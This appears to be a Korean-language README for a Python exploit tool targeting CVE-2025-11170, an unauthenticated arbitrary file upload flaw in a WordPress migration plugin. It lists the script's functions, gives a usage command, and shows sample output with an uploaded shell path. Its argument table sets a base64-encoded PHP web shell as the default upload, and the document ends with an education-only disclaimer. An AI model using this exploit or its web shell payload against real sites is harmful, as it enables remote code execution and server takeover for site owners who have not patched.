
WP 마이그레이션 전용 플러그인 for CPI <= 1.0.2 - 인증되지 않은 임의 파일 업로드
WP移行専用プラグイン for CPI <= 1.0.2 - 인증되지 않은 임의 파일 업로드
WordPress용 WP移行専用プラグイン for CPI 플러그인은 1.0.2 이하의 모든 버전에서 Cpiwm_Import_Controller::import 함수의 파일 형식 검증 누락으로 인해 임의 파일 업로드에 취약합니다.
이로 인해 인증되지 않은 공격자가 영향을 받는 사이트의 서버에 임의 파일을 업로드할 수 있으며, 잠재적으로 원격 코드 실행이 가능해집니다.
CVE-2025-11170.pyNxploited_parse_args
입력 인수를 구문 분석하고 검증합니다. 올바른 엔드포인트 구조, 헤더 및 데이터 인코딩을 보장합니다.
Nxploited_logging
상세하거나 최소한의 런타임 출력을 위한 고급 로깅 및 상세 수준을 설정합니다.
Nxploited_retry_session
복원력 있는 통신을 위해 재시도 및 백오프 로직이 포함된 영구 세션을 초기화합니다.
Nxploited_build_payload
익스플로잇을 위한 POST 요청 매개변수를 구성합니다.
Nxploited_send
취약한 엔드포인트에 실제 POST 요청을 수행하고 응답/오류를 관리합니다.
Nxploited_output_result
응답을 처리하고 형식화하여, 성공 시 셸 경로를 표시하고 그 외에는 디버깅 정보를 표시합니다.
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"
예시 출력:
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited
이 스크립트는 교육 목적으로만 제공됩니다.
적절한 허가 없이 대상에 이 익스플로잇을 사용하는 것은 불법일 수 있습니다.
저자는 어떠한 오용, 손해 또는 법적 결과에 대해 책임을 지지 않습니다.
GitHub: Nxploited
Telegram: KNxploited
제작: Nxploited ( Khaled Alenazi )
| 인수 | 설명 |
|---|
-u, --url | 기본 대상 URL (예: http://target.com/wordpress/). 스크립트는 wp-admin/admin-ajax.php를 자동으로 추가합니다. |
-f, --filename | 업로드할 셸 또는 파일 이름. 기본값: shell.php |
-d, --data | Base64(또는 원시 텍스트) 형식의 파일 콘텐츠. 기본값: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ |
-i, --index | 인덱스 필드 값. 기본값: 0 |
-H, --headers | 추가 HTTP 헤더 (형식: X-Key:Value;K2:Value2) |
-t, --timeout | HTTP 요청 시간 제한(초). 기본값: 10 |
--retries | 재시도 횟수. 기본값: 3 |
--backoff | 재시도 사이의 백오프 계수(초). 기본값: 0.7 |
-v, --verbose | 디버깅을 위한 상세 출력 수준 증가 (반복 가능) |